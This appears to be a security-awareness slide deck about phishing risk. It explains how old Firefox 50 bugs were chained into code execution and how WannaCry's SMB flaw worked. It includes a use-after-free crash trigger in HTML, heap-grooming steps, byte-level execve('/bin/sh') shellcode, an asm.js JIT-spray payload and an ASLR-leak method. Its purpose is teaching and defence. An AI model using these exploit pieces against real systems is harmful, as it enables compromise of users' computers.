phishing

Everyday dilemmas

• I did not order this new album on amazon
  ... but I do like Shakira?
• I don not know any Roxanne from facebook
  ... but maybe she knows me?
• OMG, I have just won a new Iphone !!!
• A quick look won't hurt, will it? :)

Firefox 50.0.1 vulnerabilities

One month after release:

... and a few months after release:

Honorable mentions:

... you name it

So many bugs! Which one to pick?

• First we need a bug to change execution path

• Two basic approaches:
• Altering the stack
  • Stack buffer overflow
  • Overwrite pointers on stack or return address
• Altering the heap
  • Heap corruption / use after free / double free
  • Overwrite pointers on heap (usually vptrs)

Use After Free Remote Code Execution (CVE-2016-9079)

<!DOCTYPE html>
<body>
  <button onclick="document.getElementById('containerA').pauseAnimations()">
    Click to crash
  </button>
  <svg id="containerA">
    <animate id="a" begin="0s"  end="50s"></animate>
    <animate id="b" begin="60s" end="ic.end"></animate>
  </svg>
  <svg>
    <animate id="c" begin="0s"  end="ia.end"></animate>
  </svg>
</body>
</html>

void nsSMILTimeContainer::NotifyTimeChange() {
  const MilestoneEntry* p = mMilestoneEntries.Elements();
  while (p < mMilestoneEntries.Elements() + mMilestoneEntries.Length()) {
    mozilla::dom::SVGAnimationElement* elem = p->mTimebase.get();
    elem->TimedElement().HandleContainerTimeChange();
    ++p;
  }
}

SVG milestones and dependencies

  <svg id="containerA">
    <animate id="a" begin="0s"  end="50s"></animate>
    <animate id="b" begin="60s" end="ic.end"></animate>
  </svg>
  <svg>
    <animate id="c" begin="0s"  end="ia.end"></animate>
  </svg>

• Milestone == moment in an animation lifetime
• Milestone dependencies
  • containerA has a
  • a has dependency to c
  • c has dependency to b
  • b is in containerA

(gdb) bt
  nsSMILTimeContainer::AddMilestone(...) (this=0x7f41a17188c0, ...)
  nsSMILTimedElement::RegisterMilestone() (...)
  nsSMILTimedElement::UpdateCurrentInterval(bool) (...)                                                               
  nsSMILTimedElement::UpdateInstanceTime(...) (...)
  nsSMILTimeValueSpec::HandleChangedInstanceTime(...) (...)
  nsSMILInstanceTime::HandleChangedInterval(...) (...)
  nsSMILTimedElement::NotifyChangedInterval(...) (...)
  nsSMILTimedElement::UpdateCurrentInterval(bool) (...)
  nsSMILTimedElement::UpdateInstanceTime(...) (...)
  nsSMILTimeValueSpec::HandleChangedInstanceTime(...) (...)
  nsSMILInstanceTime::HandleChangedInterval(...) (...)
  nsSMILTimedElement::NotifyChangedInterval(...) (...)
  nsSMILTimeContainer::NotifyTimeChange() (this=0x7f41a17188c0)
  mozilla::dom::SVGSVGElementBinding::pauseAnimations(...) (...)
  mozilla::dom::GenericBindingMethod(...) (...)
  js::CallJSNative(...) (...)
  js::InternalCallOrConstruct(...) (...)
  InternalCall (...) (...)
  js::CallFromStack(...) (...)
  js::jit::DoCallFallback(...) (...)

(gdb) fr 12
#12 in nsSMILTimeContainer::NotifyTimeChange (...)
(gdb) list
310    const MilestoneEntry* p = mMilestoneEntries.Elements();
314    while (p < mMilestoneEntries.Elements() + mMilestoneEntries.Length()) {
315      mozilla::dom::SVGAnimationElement* elem = p->mTimebase.get();
316      elem->TimedElement().HandleContainerTimeChange();
320      ++p;
321    }

(gdb) p mMilestoneEntries->mElements->mHdr->mLength
$2 = 5

(gdb) fr 1
#1  in nsSMILTimedElement::RegisterMilestone (...)
(gdb) fin
Run till exit from #1 nsSMILTimedElement::RegisterMilestone (...)

(gdb) fr 10
#10 in nsSMILTimeContainer::NotifyTimeChange (...)
(gdb) p mMilestoneEntries->mElements->mHdr->mLength
$3 = 6

• While browsing through containerA milestones:

  void nsSMILTimeContainer::NotifyTimeChange() {
    const MilestoneEntry* p = mMilestoneEntries.Elements();
    while (p < mMilestoneEntries.Elements() + mMilestoneEntries.Length()) {
      mozilla::dom::SVGAnimationElement* elem = p->mTimebase.get();
      elem->TimedElement().HandleContainerTimeChange();
      ++p;
    }
  }
  

  • ... we update containerA milestones
  • ... memory is reallocated
  • ... mMilestoneEntries.Length() will return new size
  • ... but are we using raw pointers to old location
• Similar bug to using invalided iterators in STL

How can the bug be exploited?

• heap grooming:
  
  
  • spray 0x80 fake objects
  
  

How can the bug be exploited?

• heap grooming:
  
  
  • spray 0x80 fake objects
  • spray 0x80 block holes

How can the bug be exploited?

• allocate the object:
  
  
  • create to animation object
  • most likely it will be placed in one of the holes

How can the bug be exploited?

• trigger reallocation:
  
  
  • pause animation extends the list
  • we are iterating extended list but with old pointer

How can the bug be exploited?

• Overwrite the vptrs on heap:
  
  
  • the fake objects contain fake vptrs
  • the vtbl entries point to exploit code

The exploit shell code

• We know how to change execution path with fake vtable.
• How to provide the code for fake functions?

Data execution protection

#include <stdio.h>
 
int main(int argc, char *argv[]) {
  unsigned char code[] = {
    0x48, 0x83, 0xec, 0x04,                   // sub    $0x4,%rsp
    0x48, 0x31, 0xc0,                         // xor    %rax,%rax
    0x48, 0x31, 0xff,                         // xor    %rdi,%rdi
    0x48, 0x31, 0xd2,                         // xor    %rdx,%rdx
    0xc7, 0x04, 0x24, 0x48, 0x69, 0x0a, 0x00, // movl   $0x000a6948,(%rsp)
                                              // [0x000a6948 == "Hi\n\0"]
    0x66, 0xbf, 0x01, 0x00,                   // mov    $0x1,%di
    0x48, 0x8d, 0x34, 0x24,                   // lea    (%rsp),%rsi
    0x66, 0xba, 0x04, 0x00,                   // mov    $0x4,%dx
    0x66, 0xb8, 0x01, 0x00,                   // mov    $0x1,%ax
    0x0f, 0x05,                               // syscall
    0x48, 0x83, 0xc4, 0x04,                   // add    $0x4,%rsp
    0xc3                                      // retq
  };

  ( (void (*)()) &code[0])();

  return 0;
}

Most likely will crush

• Memory pages have different access bits set

Data execution protection

• Memory pages marked with NX-bit
• Executing code from such page triggers SEGV
• Can't execute code from stack (configurable)
• Can't execute code from heap
• Unless ...

Bypassing DEP

• We execute code that is already in memory
  • Return oriented programming (ROP)
  • Most likely return to libc
• Force browser to map memory without NX bit

ASM.JS JIT SPRAY (CVE-2017-5375)

function payload_code(){
    var val = 0;
    val = (val + 0xa8909090)|0;
    val = (val + 0xa8909090)|0;
    val = (val + 0xa8909090)|0;
    val = (val + 0xa8909090)|0;
    val = (val + 0xa8909090)|0;
    val = (val + 0xa8909090)|0;
    val = (val + 0xa8909090)|0;
    val = (val + 0xa8909090)|0;
    // ...
}

[maciek@pc firefox]$ cat /proc/2870/maps | head
7f4506c00000-7f4507000000 rw-p 00000000 00:00 0 
7f45c7000000-7f45cf100000 rw-p 00000000 00:00 0 
7f45cf13a000-7f45cf13b000 r-xp 00000000 00:00 0  <-- Executable

[maciek@pc firefox]$ gdb -p 2870
(gdb) find 0x7f45cf13a000, 0x7f45cf13b000, 0xa8909090
0x7f45cf13a035
0x7f45cf13a03a
...

(gdb) x/8i 0x7f45cf13a034
   0x7f45cf13a034:	mov    $0xa8909090,%eax
   0x7f45cf13a039:	add    $0xa8909090,%eax
   0x7f45cf13a03e:	add    $0xa8909090,%eax
   0x7f45cf13a043:	add    $0xa8909090,%eax
   0x7f45cf13a048:	add    $0xa8909090,%eax
   0x7f45cf13a04d:	add    $0xa8909090,%eax
   0x7f45cf13a052:	add    $0xa8909090,%eax
   0x7f45cf13a057:	add    $0xa8909090,%eax

(gdb) x/8i 0x7f45cf13a034+1
   0x7f45cf13a035:	nop
   0x7f45cf13a036:	nop
   0x7f45cf13a037:	nop
   0x7f45cf13a038:	test   $0x5,%al
   0x7f45cf13a03a:	nop
   0x7f45cf13a03b:	nop
   0x7f45cf13a03c:	nop
   0x7f45cf13a03d:	test   $0x5,%al

(gdb) x/5bx 0x7f45cf13a034
0x7f45cf13a034:	0xb8	0x90	0x90	0x90	0xa8
0x7f45cf13a039:	0x05	0x90	0x90	0x90	0xa8
0x7f45cf13a03e:	0x05	0x90	0x90	0x90	0xa8
0x7f45cf13a043:	0x05	0x90	0x90	0x90	0xa8

(gdb) x/5bx 0x7f45cf13a034
0x7f45cf13a034:	0xb8	0x90	0x90	0x90	0xa8
0x7f45cf13a039:	0x05	0x90	0x90	0x90	0xa8
0x7f45cf13a03e:	0x05	0x90	0x90	0x90	0xa8
0x7f45cf13a043:	0x05	0x90	0x90	0x90	0xa8

• we control 4 out of 5 bytes:
  05 XX XX XX XX
• every 5th byte must be 0x05 (add opcode)
  • need to escape 0x05
  • use 3 bytes for instructions and 1 to escape 0x05
    

    48 ff c4       	inc    %rsp
    89 05           test   $0x5,%al  # we ignore the output 
    

  • use 0x05 for something meaningful

    90              nop
    90              nop
    90              nop
    6a 05           pushq  $05
    

3-4 bytes instruction shellcode

6a 00           	pushq  $0x0              # push '\0'
66 68 05 68     	pushw  $0x6805           # push 'h'
48 ff c4        	inc    %rsp              #
66 68 05 73     	pushw  $0x7305           # push 's'
48 ff c4        	inc    %rsp              #
66 68 05 2f     	pushw  $0x2f05           # push '/'
48 ff c4        	inc    %rsp              #
66 68 05 6e     	pushw  $0x6e05           # push 'n'
48 ff c4        	inc    %rsp              #
66 68 05 69     	pushw  $0x6905           # push 'i'
48 ff c4        	inc    %rsp              #
66 68 05 62     	pushw  $0x6205           # push 'b'
48 ff c4        	inc    %rsp              #
66 68 05 2f     	pushw  $0x2f05           # push '/'
48 ff c4        	inc    %rsp              #
48 31 c0        	xor    %rax,%rax         #
48 89 e7        	mov    %rsp,%rdi         # rdi -> "/bin/sh"
50              	push   %rax              #
48 89 e2        	mov    %rsp,%rdx         # rsp -> ""
57              	push   %rdi              #
48 89 e6        	mov    %rsp,%rsi         # rsi -> "/bin/sh", "" 
b0 3b           	mov    $0x3b,%al         #
0f 05           	syscall                  # execve

Shellcode scrabble

6a 00 90 a8 05             pushq  $0x0     # push '\0'
90 90 66 68 05 68          pushw  $0x6805  # push 'h'
   90 90 a8 05
48 ff c4 a8 05             inc    %rsp 
90 90 66 58 05 73          pushw  $0x7305  # push 's'
   90 90 a8 05
48 ff c4 a8 05             inc    %rsp
90 90 66 58 05 2f          pushw  $0x2f05  # push '/'
   90 90 a8 05
48 ff c4 a8 05             inc    %rsp
90 90 66 58 05 6e          pushw  $0x6e05  # push 'n'
   90 90 a8 05
48 ff c4 a8 05             inc    %rsp
90 90 66 58 05 69          pushw  $0x6905  # push 'i'
   90 90 a8 05
48 ff c4 a8 05             inc    %rsp
[...]
      

Hey Firefox, can you compile this for me?

function asm_js_module(){
    "use asm";
    function payload_code(){
        var val = 0;
        val = (val + 0xa8909090)|0;   // nop sled
        val = (val + 0xa8909090)|0;
        val = (val + 0xa8909090)|0;
        // [...]
        val = (val + 0xa890006a)|0;   // shell code
        val = (val + 0x68669090)|0;   // with removed
        val = (val + 0xa8909068)|0;   // 0x05 bytes
        val = (val + 0xa8c4ff48)|0;
        val = (val + 0x68669090)|0;
        val = (val + 0xa8909073)|0; 
        val = (val + 0xa8c4ff48)|0;
        val = (val + 0x68669090)|0;
        val = (val + 0xa890902f)|0;
        val = (val + 0xa8c4ff48)|0;
        /// [...]

        return val|0;
    }
    return payload_code 
}

The exploit shell code

• We know change execution path with fake vtable.
• We know how to compile the shell code.
• How to find the shell code address in memory?

Address space layout randomization

• Makes addresses prediction very hard
• Random layout of memory with each execution:
  

Memory disclosure (CVE-2017-5465)

The SVG feConvolveMatrix

Input validation error

• Failed to validate negative value for kernelUnitLength

  <filter id="mem-read">
  <feConvolveMatrix
    kernelMatrix="0.000000238 0 0 0 0 0 0 0 0"
    kernelUnitLength="-0.5 -0.5"/>
  </filter>
  

• Reading data out of bounds
• Found pointers allow to detect randomized offset

ASLR leak - siede channel (CVE-2017-5378)

What is the simplest way to hash an object?

• pointer to strings and objects are truncated
• the value is scrambled with ScrambleHashCode()

  inline HashNumber ScrambleHashCode(HashNumber h) {
      static const HashNumber goldenRhatio = 0x9E3779B9U;
      return h * goldenRatio;
  }
  

• scrambled value derive hashmap bucket indexes

     Data* lookup(const Lookup& l, HashNumber h) {
          for (Data* e = hashTable[h >> hashShift]; e; e = e->chain) {
              // ...
          }
          return nullptr;
      }
  

How can this be exploited?

• We know the scramble function
• ... we can predict the has bucket for any integer value

• How to find bucket number for integer X:
  • Create 64 bucket Set
  • fill only one bucket with N values
  • Measure time of inserting X to set
  • Repeat this for 64 Sets with different bucked filled

• • Insert time reveals a single bit of bucket number
  • Repeat this doubling the bucket size
  • ... this will find 22-bit bucket index bit by bit

What to do with bucket index?

• It maps to N possible values (potential addresses)

• But Firefox at start allocates atoms for:
  • Characters: '\1', '\2', '\3', ...
  • They are placed with 0x18 offset
  • So we have 256 lists of potential pointers
  • By subtracting i*0x18 from addresses for character i
    • all 256 lists are candidates for same address
    • union of the lists can reveal single address
      (address of character '\1')
• From this address we can derive other addresses
  • ... and defeat ASLR

What you see in tv

What is the reality

Scary version (unnoticed attack)

Wanna Cry !

int __stdcall SrvOs2FeaListSizeToNt(_DWORD *a1) {
  _WORD *v1; // eax@1
  unsigned int v2; // edi@1
  unsigned int v3; // esi@1
  int v4; // ebx@3
  int v6; // [sp+Ch] [bp-4h]@1

  v1 = a1;
  v6 = 0;
  v2 = (unsigned int)a1 + *a1;
  v3 = (unsigned int)(a1 + 1);
  if ( (unsigned int)(a1 + 1) < v2 ) {
    while ( v3 + 4 < v2 ) {
       // loop through the data
       // ...
    }

    // store the frame size
    *v1 = (_WORD)(v3 - v1);
  }
  return v6;
}

Wanna Cry !

• Integer truncation
• ... truncated size used later to allocate buffer
• ... while memcpy uses original (larger) size
• ... so again we use heap grooming
• ... and some other minor tricks
• ... trigger the bug
• ... and we have a very predictable buffer overflow

Same old story, but ...

• No user interaction required
• Only requires PC with SMBv1 enabled
• Can spread very quickly throughout the network
• Is able to create permanent backdoor for interactive sessions

Summary

• Our network is protected from to outside word
• It is hard to access our PCs from outside company
• Web traffic is not blocked
• There are many bugs that can exist in software for years
• And there are professionals who try very hard to exploit those bugs
• Do not want to be that person who invited the attacker in
• ... by clicking a single link from an email.

Thank you